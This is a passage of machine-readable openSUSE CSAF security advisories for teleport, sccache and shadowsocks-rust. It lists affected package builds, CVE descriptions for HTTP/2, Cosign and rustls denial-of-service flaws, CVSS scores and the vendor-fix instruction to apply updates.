Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "teleport-tsh-15.2.4-1.1.ppc64le as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.ppc64le" }, "product_reference": "teleport-tsh-15.2.4-1.1.ppc64le", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "teleport-tsh-15.2.4-1.1.s390x as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.s390x" }, "product_reference": "teleport-tsh-15.2.4-1.1.s390x", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "teleport-tsh-15.2.4-1.1.x86_64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.x86_64" }, "product_reference": "teleport-tsh-15.2.4-1.1.x86_64", "relates_to_product_reference": "openSUSE Tumbleweed" } ] }, "vulnerabilities": [ { "cve": "CVE-2023-45288", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2023-45288" } ], "notes": [ { "category": "general", "text": "An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of header data by sending an excessive number of CONTINUATION frames. Maintaining HPACK state requires parsing and processing all HEADERS and CONTINUATION frames on a connection. When a request\u0027s headers exceed MaxHeaderBytes, no memory is allocated to store the excess headers, but they are still parsed. This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amounts of header data, all associated with a request which is going to be rejected. These headers can include Huffman-encoded data which is significantly more expensive for the receiver to decode than for an attacker to send. The fix sets a limit on the amount of excess header frames we will process before closing a connection.", "title": "CVE description" } ], "product_status": { "recommended": [ "openSUSE Tumbleweed:teleport-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2023-45288", "url": "https://www.suse.com/security/cve/CVE-2023-45288" }, { "category": "external", "summary": "SUSE Bug 1221400 for CVE-2023-45288", "url": "https://bugzilla.suse.com/1221400" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "openSUSE Tumbleweed:teleport-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.3, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "products": [ "openSUSE Tumbleweed:teleport-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2024-06-15T00:00:00Z", "details": "moderate" } ], "title": "CVE-2023-45288" }, { "cve": "CVE-2024-29902", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-29902" } ], "notes": [ { "category": "general", "text": "Cosign provides code signing and transparency for containers and binaries. Prior to version 2.2.4, a remote image with a malicious attachment can cause denial of service of the host machine running Cosign. This can impact other services on the machine that rely on having memory available such as a Redis database which can result in data loss. It can also impact the availability of other services on the machine that will not be available for the duration of the machine denial. The root cause of this issue is that Cosign reads the attachment from a remote image entirely into memory without checking the size of the attachment first. As such, a large attachment can make Cosign read a large attachment into memory; If the attachments size is larger than the machine has memory available, the machine will be denied of service. The Go runtime will make a SigKill after a few seconds of system-wide denial. This issue can allow a supply-chain escalation from a compromised registry to the Cosign user: If an attacher has compromised a registry or the account of an image vendor, they can include a malicious attachment and hurt the image consumer. Version 2.2.4 contains a patch for the vulnerability.", "title": "CVE description" } ], "product_status": { "recommended": [ "openSUSE Tumbleweed:teleport-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-29902", "url": "https://www.suse.com/security/cve/CVE-2024-29902" }, { "category": "external", "summary": "SUSE Bug 1222835 for CVE-2024-29902", "url": "https://bugzilla.suse.com/1222835" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "openSUSE Tumbleweed:teleport-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 4.2, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "openSUSE Tumbleweed:teleport-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2024-06-15T00:00:00Z", "details": "moderate" } ], "title": "CVE-2024-29902" }, { "cve": "CVE-2024-32650", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-32650" } ], "notes": [ { "category": "general", "text": "Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11.", "title": "CVE description" } ], "product_status": { "recommended": [ "openSUSE Tumbleweed:teleport-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-32650", "url": "https://www.suse.com/security/cve/CVE-2024-32650" }, { "category": "external", "summary": "SUSE Bug 1223211 for CVE-2024-32650", "url": "https://bugzilla.suse.com/1223211" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "openSUSE Tumbleweed:teleport-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "openSUSE Tumbleweed:teleport-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.x86_64", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.aarch64", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.ppc64le", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.s390x", "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2024-06-15T00:00:00Z", "details": "important" } ], "title": "CVE-2024-32650" } ] }
opensuse-su-2024:13961-1
Vulnerability from csaf_opensuse
Notes
{ "document": { "aggregate_severity": { "namespace": "https://www.suse.com/support/security/rating/", "text": "moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright 2024 SUSE LLC. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "sccache-0.8.0~3-1.1 on GA media", "title": "Title of the patch" }, { "category": "description", "text": "These are all security issues fixed in the sccache-0.8.0~3-1.1 package on the GA media of openSUSE Tumbleweed.", "title": "Description of the patch" }, { "category": "details", "text": "openSUSE-Tumbleweed-2024-13961", "title": "Patchnames" }, { "category": "legal_disclaimer", "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", "title": "Terms of use" } ], "publisher": { "category": "vendor", "contact_details": "https://www.suse.com/support/security/contact/", "name": "SUSE Product Security Team", "namespace": "https://www.suse.com/" }, "references": [ { "category": "external", "summary": "SUSE ratings", "url": "https://www.suse.com/support/security/rating/" }, { "category": "self", "summary": "URL of this CSAF notice", "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_13961-1.json" }, { "category": "self", "summary": "SUSE CVE CVE-2024-32650 page", "url": "https://www.suse.com/security/cve/CVE-2024-32650/" } ], "title": "sccache-0.8.0~3-1.1 on GA media", "tracking": { "current_release_date": "2024-06-15T00:00:00Z", "generator": { "date": "2024-06-15T00:00:00Z", "engine": { "name": "cve-database.git:bin/generate-csaf.pl", "version": "1" } }, "id": "openSUSE-SU-2024:13961-1", "initial_release_date": "2024-06-15T00:00:00Z", "revision_history": [ { "date": "2024-06-15T00:00:00Z", "number": "1", "summary": "Current version" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version", "name": "sccache-0.8.0~3-1.1.aarch64", "product": { "name": "sccache-0.8.0~3-1.1.aarch64", "product_id": "sccache-0.8.0~3-1.1.aarch64" } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "sccache-0.8.0~3-1.1.ppc64le", "product": { "name": "sccache-0.8.0~3-1.1.ppc64le", "product_id": "sccache-0.8.0~3-1.1.ppc64le" } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "sccache-0.8.0~3-1.1.s390x", "product": { "name": "sccache-0.8.0~3-1.1.s390x", "product_id": "sccache-0.8.0~3-1.1.s390x" } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "sccache-0.8.0~3-1.1.x86_64", "product": { "name": "sccache-0.8.0~3-1.1.x86_64", "product_id": "sccache-0.8.0~3-1.1.x86_64" } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_name", "name": "openSUSE Tumbleweed", "product": { "name": "openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed", "product_identification_helper": { "cpe": "cpe:/o:opensuse:tumbleweed" } } } ], "category": "product_family", "name": "SUSE Linux Enterprise" } ], "category": "vendor", "name": "SUSE" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "sccache-0.8.0~3-1.1.aarch64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:sccache-0.8.0~3-1.1.aarch64" }, "product_reference": "sccache-0.8.0~3-1.1.aarch64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "sccache-0.8.0~3-1.1.ppc64le as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:sccache-0.8.0~3-1.1.ppc64le" }, "product_reference": "sccache-0.8.0~3-1.1.ppc64le", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "sccache-0.8.0~3-1.1.s390x as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:sccache-0.8.0~3-1.1.s390x" }, "product_reference": "sccache-0.8.0~3-1.1.s390x", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "sccache-0.8.0~3-1.1.x86_64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:sccache-0.8.0~3-1.1.x86_64" }, "product_reference": "sccache-0.8.0~3-1.1.x86_64", "relates_to_product_reference": "openSUSE Tumbleweed" } ] }, "vulnerabilities": [ { "cve": "CVE-2024-32650", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-32650" } ], "notes": [ { "category": "general", "text": "Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11.", "title": "CVE description" } ], "product_status": { "recommended": [ "openSUSE Tumbleweed:sccache-0.8.0~3-1.1.aarch64", "openSUSE Tumbleweed:sccache-0.8.0~3-1.1.ppc64le", "openSUSE Tumbleweed:sccache-0.8.0~3-1.1.s390x", "openSUSE Tumbleweed:sccache-0.8.0~3-1.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-32650", "url": "https://www.suse.com/security/cve/CVE-2024-32650" }, { "category": "external", "summary": "SUSE Bug 1223211 for CVE-2024-32650", "url": "https://bugzilla.suse.com/1223211" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "openSUSE Tumbleweed:sccache-0.8.0~3-1.1.aarch64", "openSUSE Tumbleweed:sccache-0.8.0~3-1.1.ppc64le", "openSUSE Tumbleweed:sccache-0.8.0~3-1.1.s390x", "openSUSE Tumbleweed:sccache-0.8.0~3-1.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "openSUSE Tumbleweed:sccache-0.8.0~3-1.1.aarch64", "openSUSE Tumbleweed:sccache-0.8.0~3-1.1.ppc64le", "openSUSE Tumbleweed:sccache-0.8.0~3-1.1.s390x", "openSUSE Tumbleweed:sccache-0.8.0~3-1.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2024-06-15T00:00:00Z", "details": "important" } ], "title": "CVE-2024-32650" } ] }
opensuse-su-2024:13893-1
Vulnerability from csaf_opensuse
Notes
{ "document": { "aggregate_severity": { "namespace": "https://www.suse.com/support/security/rating/", "text": "moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright 2024 SUSE LLC. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "shadowsocks-rust-1.18.3-1.1 on GA media", "title": "Title of the patch" }, { "category": "description", "text": "These are all security issues fixed in the shadowsocks-rust-1.18.3-1.1 package on the GA media of openSUSE Tumbleweed.", "title": "Description of the patch" }, { "category": "details", "text": "openSUSE-Tumbleweed-2024-13893", "title": "Patchnames" }, { "category": "legal_disclaimer", "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", "title": "Terms of use" } ], "publisher": { "category": "vendor", "contact_details": "https://www.suse.com/support/security/contact/", "name": "SUSE Product Security Team", "namespace": "https://www.suse.com/" }, "references": [ { "category": "external", "summary": "SUSE ratings", "url": "https://www.suse.com/support/security/rating/" }, { "category": "self", "summary": "URL of this CSAF notice", "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_13893-1.json" }, { "category": "self", "summary": "SUSE CVE CVE-2024-32650 page", "url": "https://www.suse.com/security/cve/CVE-2024-32650/" } ], "title": "shadowsocks-rust-1.18.3-1.1 on GA media", "tracking": { "current_release_date": "2024-06-15T00:00:00Z", "generator": { "date": "2024-06-15T00:00:00Z", "engine": { "name": "cve-database.git:bin/generate-csaf.pl", "version": "1" } }, "id": "openSUSE-SU-2024:13893-1", "initial_release_date": "2024-06-15T00:00:00Z", "revision_history": [ { "date": "2024-06-15T00:00:00Z", "number": "1", "summary": "Current version" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version", "name": "shadowsocks-rust-1.18.3-1.1.aarch64", "product": { "name": "shadowsocks-rust-1.18.3-1.1.aarch64", "product_id": "shadowsocks-rust-1.18.3-1.1.aarch64" } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "shadowsocks-rust-1.18.3-1.1.ppc64le", "product": { "name": "shadowsocks-rust-1.18.3-1.1.ppc64le", "product_id": "shadowsocks-rust-1.18.3-1.1.ppc64le" } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "shadowsocks-rust-1.18.3-1.1.s390x", "product": { "name": "shadowsocks-rust-1.18.3-1.1.s390x", "product_id": "shadowsocks-rust-1.18.3-1.1.s390x" } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "shadowsocks-rust-1.18.3-1.1.x86_64", "product": { "name": "shadowsocks-rust-1.18.3-1.1.x86_64", "product_id": "shadowsocks-rust-1.18.3-1.1.x86_64" } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_name", "name": "openSUSE Tumbleweed", "product": { "name": "openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed", "product_identification_helper": { "cpe": "cpe:/o:opensuse:tumbleweed" } } } ], "category": "product_family", "name": "SUSE Linux Enterprise" } ], "category": "vendor", "name": "SUSE" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "shadowsocks-rust-1.18.3-1.1.aarch64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:shadowsocks-rust-1.18.3-1.1.aarch64" }, "product_reference": "shadowsocks-rust-1.18.3-1.1.aarch64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "shadowsocks-rust-1.18.3-1.1.ppc64le as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:shadowsocks-rust-1.18.3-1.1.ppc64le" }, "product_reference": "shadowsocks-rust-1.18.3-1.1.ppc64le", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "shadowsocks-rust-1.18.3-1.1.s390x as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:shadowsocks-rust-1.18.3-1.1.s390x" }, "product_reference": "shadowsocks-rust-1.18.3-1.1.s390x", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "shadowsocks-rust-1.18.3-1.1.x86_64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:shadowsocks-rust-1.18.3-1.1.x86_64" }, "product_reference": "shadowsocks-rust-1.18.3-1.1.x86_64", "relates_to_product_reference": "openSUSE Tumbleweed" } ] }, "vulnerabilities": [ { "cve": "CVE-2024-32650", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-32650" } ], "notes": [ { "category": "general", "text": "Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11.", "title": "CVE description" } ], "product_status": { "recommended": [ "openSUSE Tumbleweed:shadowsocks-rust-1.18.3-1.1.aarch64", "openSUSE Tumbleweed:shadowsocks-rust-1.18.3-1.1.ppc64le", "openSUSE Tumbleweed:shadowsocks-rust-1.18.3-1.1.s390x", "openSUSE Tumbleweed:shadowsocks-rust-1.18.3-1.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-32650", "url": "https://www.suse.com/security/cve/CVE-2024-32650" }, { "category": "external", "summary": "SUSE Bug 1223211 for CVE-2024-32650", "url": "https://bugzilla.suse.com/1223211" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "openSUSE Tumbleweed:shadowsocks-rust-1.18.3-1.1.aarch64", "openSUSE Tumbleweed:shadowsocks-rust-1.18.3-1.1.ppc64le", "openSUSE Tumbleweed:shadowsocks-rust-1.18.3-1.1.s390x", "openSUSE Tumbleweed:shadowsocks-rust-1.18.3-1.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "openSUSE Tumbleweed:shadowsocks-rust-1.18.3-1.1.aarch64", "openSUSE Tumbleweed:shadowsocks-rust-1.18.3-1.1.ppc64le", "openSUSE Tumbleweed:shadowsocks-rust-1.18.3-1.1.s390x", "openSUSE Tumbleweed:shadowsocks-rust-1.18.3-1.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2024-06-15T00:00:00Z", "details": "important" } ], "title": "CVE-2024-32650" } ] }
opensuse-su-2024:14424-1
Vulnerability from csaf_opensuse
Notes
